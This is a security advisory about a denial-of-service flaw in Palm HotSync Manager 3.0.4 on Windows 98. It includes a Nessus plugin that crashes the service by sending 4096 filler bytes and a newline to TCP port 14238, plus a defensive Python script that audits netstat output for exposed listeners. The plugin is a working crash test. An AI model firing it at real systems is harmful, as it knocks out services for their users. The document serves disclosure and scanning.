Palm HotSync Manager is vulnerable to Denial of Service attack

Summary

HotSync Manager provides network synchronization between the Palm Desktop and a remote Palm PDA that is connected via the Internet. This feature is used to back up the information from the Palm PDA to a secure location. However, using HotSync Manager over the network exposes it to an attack in which anyone with a network connection to the station running HotSync Manager can crash the application and possibly execute arbitrary code.

Credit:

3Com’s Palm computing team is aware of the problem and will fix this issue in the next release of the HotSync Manager.


Details

Vulnerable systems:
HotSync Manager 3.0.4 under Windows 98

Non vulnerable systems:
HotSync Manager 3.0.4 under Windows 2000

Exploit:
By connecting to the HotSync Manager’s TCP listening port (TCP port 14238), and sending a large amount of data followed by a newline, it is possible to crash the HotSync Manager.

The following Nessus Plugin can be used to test this:
#
# This script was written by Noam Rathaus <noamr@securiteam1.com>
#
# See the Nessus Scripts License for details
#
#
if(description)
{
 name["english"] = "HotSync Manager Denial of Service attack";
 script_name(english:name["english"]);

 desc["english"] = "It is possible to cause HotSync Manager to crash by sending a few bytes
of garbage into its listening port TCP 14238.

Solution: Block those ports from outside communication

Risk factor : Low";

 script_description(english:desc["english"]);

 summary["english"] = "HotSync Manager Denial of Service attack";
 script_summary(english:summary["english"]);

 # Marked as a denial-of-service test: it can crash the target service
 script_category(ACT_DENIAL);

 script_copyright(english:"This script is Copyright (C) 1999 SecuriTeam");
 family["english"] = "Windows";
 script_family(english:family["english"]);

 exit(0);
}

#
# The script code starts here
#

if (get_port_state(14238))
{
 sock14238 = open_sock_tcp(14238);
 if (sock14238)
 {
  # 4096 filler bytes followed by a newline, as described in the advisory
  data_raw = crap(4096) + string("\n");
  send(socket:sock14238, data:data_raw);
  close(sock14238);

  # Give the service time to fail before probing the port again
  sleep(5);

  sock14238_sec = open_sock_tcp(14238);
  if (sock14238_sec)
  {
   # Port still answers: the service survived, report it only as open
   security_warning(port:14238, data:"HotSync Manager port is open.");
  }
  else
  {
   # Port no longer answers: the service crashed
   security_hole(port:14238);
  }
 }
}
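
The plugin's stated solution is to block TCP port 14238 from outside communication. The following Python script is an added example, not part of the original advisory or the Nessus plugin: it audits `netstat -an` output for HotSync listeners reachable from the network and for connected peers outside a trusted range. The sample output, the function name `audit_hotsync_exposure` and the trusted network 192.168.1.0/24 are assumptions made for illustration.

```python
import ipaddress
import re

HOTSYNC_PORT = 14238  # Network HotSync TCP port named in the advisory

# Constructed sample of Windows `netstat -an` output (not from the advisory).
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:14238          0.0.0.0:0              LISTENING
  TCP    127.0.0.1:1025         0.0.0.0:0              LISTENING
  TCP    192.168.1.20:14238     203.0.113.7:3051       ESTABLISHED
  TCP    192.168.1.20:14238     192.168.1.35:1188      ESTABLISHED
  TCP    192.168.1.20:139       0.0.0.0:0              LISTENING
  UDP    192.168.1.20:137       *:*
"""

# Proto, local addr:port, foreign addr:port, state
ROW = re.compile(r"^\s*TCP\s+(\S+):(\d+)\s+(\S+):(\d+)\s+(\S+)\s*$")


def audit_hotsync_exposure(netstat_text, trusted_net="192.168.1.0/24"):
    """Report network-reachable HotSync listeners and untrusted peers.

    trusted_net is an assumed example range; set it to the real sync network.
    """
    trusted = ipaddress.ip_network(trusted_net)
    findings = {"exposed_listeners": [], "untrusted_peers": []}
    for line in netstat_text.splitlines():
        m = ROW.match(line)
        if not m or int(m.group(2)) != HOTSYNC_PORT:
            continue
        local_ip, peer_ip, state = m.group(1), m.group(3), m.group(5)
        if state == "LISTENING":
            # A loopback-only bind cannot be reached from the network.
            if not ipaddress.ip_address(local_ip.strip("[]")).is_loopback:
                findings["exposed_listeners"].append(local_ip)
        elif state == "ESTABLISHED":
            if ipaddress.ip_address(peer_ip.strip("[]")) not in trusted:
                findings["untrusted_peers"].append(peer_ip)
    return findings


if __name__ == "__main__":
    result = audit_hotsync_exposure(SAMPLE_NETSTAT)
    for ip in result["exposed_listeners"]:
        print(f"TCP {HOTSYNC_PORT} listening on {ip}: filter it at the host or perimeter")
    for ip in result["untrusted_peers"]:
        print(f"Connection to TCP {HOTSYNC_PORT} from untrusted address {ip}")
```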
